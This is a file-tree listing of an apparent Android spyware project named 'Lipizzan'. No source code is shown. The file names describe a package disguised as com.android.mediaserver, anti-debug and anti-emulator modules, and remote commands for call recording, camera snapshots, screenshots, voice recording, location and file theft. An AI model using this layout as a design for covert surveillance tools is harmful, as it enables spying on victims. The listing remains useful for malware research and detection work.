# Lipizzan

./: README.md  build.gradle
app/: build.gradle
app/src/main/: AndroidManifest.xml
app/src/main/assets/: config.json  config_pc.json  filetree_arm64-v8a  filetree_armeabi  filetree_armeabi-v7a  filetree_mips  filetree_mips64  filetree_x86  filetree_x86_64  hijack  ldir_arm64-v8a  ldir_armeabi  ldir_armeabi-v7a  ldir_mips  ldir_mips64  ldir_x86  ldir_x86_64
app/src/main/java/com/android/mediaserver/: AppConstants.java  AppCore.java  MainActivity.java  MyApplication.java
app/src/main/java/com/android/mediaserver/anti/: AntiDebug.java  AntiEmulator.java
app/src/main/java/com/android/mediaserver/call/: CallMediaRecorder.java  CallReceiver.java  CallRecorderService.java
app/src/main/java/com/android/mediaserver/camera/: CameraManager.java  CameraSnapshot.java  CameraType.java  ModuleCamera.java
app/src/main/java/com/android/mediaserver/command/: CameraSnapshotCommand.java  Command.java  CommandHandler.java  CommandType.java  ConfigurationCommand.java  FetchUserFileCommand.java  KillCommand.java  LocationCommand.java  PushCommandReceiver.java  RuntimeTypeAdapterFactory.java  SchedulableCommand.java  ScreenshotCommand.java  VoiceRecordCommand.java
app/src/main/java/com/android/mediaserver/config/: Config.java
app/src/main/java/com/android/mediaserver/db/: DatabaseManager.java  FetchedFileInfo.java
app/src/main/java/com/android/mediaserver/encoder/: AmrInputStream.java  FFT.java
app/src/main/java/com/android/mediaserver/fetchers/: ContentType.java  FetchedFile.java  FetchersManager.java
app/src/main/java/com/android/mediaserver/file/: FileLister.java  (+2 more)
app/src/main/res/layout/: activity_main.xml
app/src/main/res/values/: strings.xml
app/src/main/res/xml/: wakeful.xml
(+132 files in other folders)
